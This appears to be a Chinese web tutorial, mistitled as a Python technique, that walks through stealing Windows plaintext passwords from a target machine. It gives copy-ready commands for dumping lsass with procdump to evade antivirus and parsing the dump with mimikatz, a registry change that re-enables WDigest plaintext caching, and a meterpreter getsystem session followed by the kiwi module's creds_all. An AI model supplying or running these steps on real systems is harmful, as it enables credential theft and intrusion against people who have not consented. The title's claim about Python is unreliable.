python簡單直接獲取windows明文密碼操作技巧
01、Procdump+Mimikatz
利用procdump+Mimikatz 繞過殺軟獲取Windows明文密碼。
(1)工具準(zhǔn)備:
ProcDump:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
mimikatz:
https://github.com/gentilkiwi/mimikatz/
(2)Windows Server 2008 R2提取明文密碼
在目標(biāo)機(jī)器上生成存儲(chǔ)文件:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
將lsass.dmp復(fù)制到本地,使用mimikatz 一行命令將結(jié)果輸出到文本。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt
如圖:成功從內(nèi)存中提取明文密碼。
02、Window 2012 R2抓取密碼
在Windows2012系統(tǒng)及以上的系統(tǒng),默認(rèn)在內(nèi)存緩存中禁止保存明文密碼的。攻擊者可以通過修改注冊(cè)表的方式抓取明文,需要用戶重新登錄后才能成功抓取。
(1)修改注冊(cè)表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
(2)用戶administrator注銷后重新登錄,成功抓取到明文信息。
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt
03、MSF kiwi模塊
使用kiwi模塊需要system權(quán)限,所以我們?cè)谑褂迷撃K之前需要將當(dāng)前MSF中的shell提升為system。
提到system有兩個(gè)方法,一是當(dāng)前的權(quán)限是administrator用戶,二是利用其它手段先提權(quán)到administrator用戶。然后administrator用戶可以直接getsystem到system權(quán)限。
meterpreter > getuid Server username: BYPASS-E97BA3FC\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
加載kiwi模塊:
load kiwi
列舉系統(tǒng)中的明文密碼:
creds_all
以上就是python簡單直接獲取windows明文密碼操作技巧的詳細(xì)內(nèi)容,更多關(guān)于python獲取windows明文密碼的資料請(qǐng)關(guān)注本站其它相關(guān)文章!
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。